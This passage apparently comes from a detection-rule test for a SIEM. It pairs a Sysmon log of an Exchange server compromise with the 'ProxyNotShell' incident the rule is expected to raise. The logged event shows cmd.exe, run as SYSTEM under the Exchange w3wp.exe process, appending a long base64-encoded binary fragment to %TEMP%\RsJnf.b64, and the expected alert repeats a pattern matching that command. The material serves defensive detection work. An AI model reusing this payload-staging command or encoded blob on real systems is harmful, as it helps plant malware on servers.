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>>%%TEMP%%\\\\RsJnf.b64\",\"Name\":\"CommandLine\"},{\"text\":\"c:\\\\windows\\\\system32\\\\inetsrv\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{d5e182b9-36b7-641b-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"0\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18\",\"Name\":\"Hashes\"},{\"text\":\"{d5e182b9-3724-641b-d100-000000002700}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"10384\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\"Name\":\"ParentImage\"},{\"text\":\"c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe -ap \\\"MSExchangePowerShellAppPool\\\" -v \\\"v4.0\\\" -c \\\"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\bin\\\\GenericAppPoolConfigWithGCServerEnabledFalse.config\\\" -a \\\\\\\\.\\\\pipe\\\\iisipm6ed2a926-10ba-4360-834b-895310382a0a -h \\\"C:\\\\inetpub\\\\temp\\\\apppools\\\\MSExchangePowerShellAppPool\\\\MSExchangePowerShellAppPool.config\\\" -w \\\"\\\" -m 0\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "d5e182b9-36b7-641b-e703-000000000000", "event_src.category": "Other", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo 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>>%%TEMP%%\\RsJnf.b64", "object.process.cwd": "c:\\windows\\system32\\inetsrv\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "d5e182b9-2e62-6424-c825-000000002700", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "911D039E71583A07320B32BDE22F8E22", "object.process.hash.sha256": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.id": "7524", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangePowerShellAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipm6ed2a926-10ba-4360-834b-895310382a0a -h \"C:\\inetpub\\temp\\apppools\\MSExchangePowerShellAppPool\\MSExchangePowerShellAppPool.config\" -w \"\" -m 0", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.guid": "d5e182b9-3724-641b-d100-000000002700", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T09:59:22.529Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:10.050Z", "type": "raw", "uuid": "b07ebac2-d06f-4de1-b74d-f1444a26e12c"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.regex_match": "/c echo ...>>%%temp%%\\rsjnf.b64", "category.generic": "Attack", "category.high": "Initial Access", "category.low": "Exploit Public-Facing Application", "correlation_name": "ProxyNotShell", "correlation_type": "incident", "datafield6": "d5e182b9-36b7-641b-e703-000000000000", "detect": "CVE-2022-41040|CVE-2022-41082", "dst.fqdn": "exchange.example.com", "dst.host": "exchange.example.com", "dst.hostname": "exchange", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "ProxyNotShell|exchange.example.com|k_ivanov", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.session_id": "999", 